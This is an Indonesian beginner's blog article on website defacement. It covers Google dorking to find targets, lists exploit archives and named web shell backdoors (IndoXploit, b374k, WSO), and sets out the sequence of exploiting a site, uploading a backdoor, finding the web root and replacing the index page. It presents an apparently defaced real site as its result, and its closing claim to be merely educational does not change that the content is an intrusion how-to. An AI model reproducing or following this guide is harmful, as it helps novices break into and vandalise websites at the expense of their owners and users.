Artinya, defacer mendeface suatu situs tidak secara penuh, bisa hanya dengan menampilkan beberapa kata, gambar atau penambahan script-script yang mengganggu, hal ini umumnya hanya akan memperlihatkan tampilan file yang di deface menjadi kacau dan umumnya cukup mengganggu, defacer biasanya mencari celah baik dari kelemahan scripting yang digunakan dengan XSS injection, bisa dengan SQL atau database injection dan juga beberapa vulnerabilities yang seringkali ditemukan pada situs-situs yang dibangun dengan menggunakan CMS (Content Manajemen System).

Apa saja yang perlu diketahui:

a. Dorking
Dorking merupakan teknik pencarian yang digunakan untuk mencari sebuah hasil/result yang sifatnya lebih spesifik/detail. Contohnya, pada Google Dork ( atau dorking menggunakan mesin pencari Google ), untuk mencari hal-hal yang berkaitan dengan "judul website" tertentu kita dapat mencarinya menggunakan intitle.
contoh:
intitle:"Belajar Deface"

adapun: - intext:"belajar deface" -> mencari sesuatu berdasarkan apa yang ada dalam content website yang ingin kita cari
- inurl:/deface.html -> mencari berdasarkan pada url website.
- filetype:.html -> mencari berdasarkan tipe file pada website yang ingin di cari.
- site:id -> mencari berdasarkan domain ( negara tertentu ). id = indonesia
Referensi:
- https://www.sans.org/security-resources/GoogleCheatSheet.pdf
- https://mr500errorcode.wordpress.com/2015/04/05/google-dork/

b. Exploit
Exploit adalah sebuah kode yang menyerang keamanan_komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan.
Dalam hal ini (deface), exploit yang dimaksud yaitu sebuah proses dimana kita menyerang sebuah website menggunakan malicius code/dengan memanfaatkan kelemahan sistem pada website itu sendiri ( bug/celah/vulnerability). Sehingga kita mampu masuk kedalam website target dengan mudah dan menyisipkan sebuah backdoor yang nantinya kita dapat mengendalikan website itu.
Banyak website yang menyediakan berbagai exploit-exploit.
- exploit-db.com
- wordpressexploit.com ( khusus tempat exploit-exploit wordpress CMS)
- joomlaexploit.com ( khusus tempat exploit-exploit joomla CMS)
- 0day.today

c. Shell Backdoor
Shell backdoor/pintu belakang, merupakan sebuah code-code yang di buat oleh seorang coders hingga menjadi sebuah susunan code yang sedemikian rupa yang mampu digunakan untuk memudahkan kita mengendalikan sebuah website/server. Bagaimana Shell Backdoor ini sendiri bekerja? yap, pada sebelumnya kita telah membahas tentang exploit. Setelah kita meng-exploit sebuah target, ada proses setelah exploit kita menyisipkan/mengupload sebuah backdoor agar kita lebih dimudahkan mengendalikan website tersebut.
Ada beberapa bentuk/jenis shell backdoor yang sudah dibuat sebelumnya. Contohnya:
- IndoXploit Shell
- b374k
- Shell 1n73ct10n
- WSO Shell
- Hmei7 ASP Shell
- Umer Rock ASP Shell
- dan masih banyak lagi.....

Setelah kita mengetahui itu semua, mungkin ketika kita ingin mempelajari exploit-exploit yang lain. Pasti kita sudah mengetahui proses/step by stepnya. Apa yang harus dilakukan pertama kali, bagaimana agar kita meng-upload backdoor nya....

Nah biasanya ketika kita sudah berhasil mendapatkan akses backdoor..

Inilah step/langkah akhir bagaimana kita men-deface/mengganti halaman awal website tersebut dengan script deface milik kita.
dalam sebuah website terdapat directory-directory atau biasa dikenal dengan folder, dimana ada folder yang menjadi home root/root folder/halawan awal itu sendiri di tempatkan. Dan biasanya terdapat pada /home/username/public_html

NB: dan ingat setiap website memiliki home root yang berbeda-beda.

Jika kita sudah tau/sudah berada dalam home root nya. langsung saja kita upload file deface kita.
*Jika kita menggunakan shell IndoXploit, kita tidak perlu lagi cape-cape mencari home root nya, jika kita tidak tau dimana letaknya.
Cukup buka fitur upload pada shell indoxploit, lalu pilih opsi home_root (cek pada gambar) dan setelah di klik upload maka otomatis shell akan memberi tahu kita bahwa pada bagian halaman awalnya sudah berhasil terupload script kita.

Yap, ini dia hasilnya.
http://moonveda.com/ atau http://moonveda.com/index.html
Oke sekian dulu, semoga bermanfaat

Artikel ini ditujukan bagi kalian yang masih newbie/pemula dan ingin belajar deface/bingung apa yang pertama harus dilakukan saat belajar deface. Artikel ini bertujuan untuk edukasi dan pengetahuan, yang bersifat umum dan secara keseluruhan. Artikel ini bukanlah artikel yang membahas tutorial cara meretas/mendeface dengan exploit tertentu. Melainkan artikel yang membahas secara luas bagaimana peretasan website/deface itu dilakukan.
Artikel ini diolah dari berbagai sumber:
- https://apriyandis.wordpress.com/2013/11/20/pengertian-deface-dan-contoh-kasus-di-indonesia/
- https://mr500errorcode.wordpress.com/2015/04/05/google-dork/
- http://mata-cyber.blogspot.co.id/2014/06/apa-itu-web-attack-beserta-alur-web.html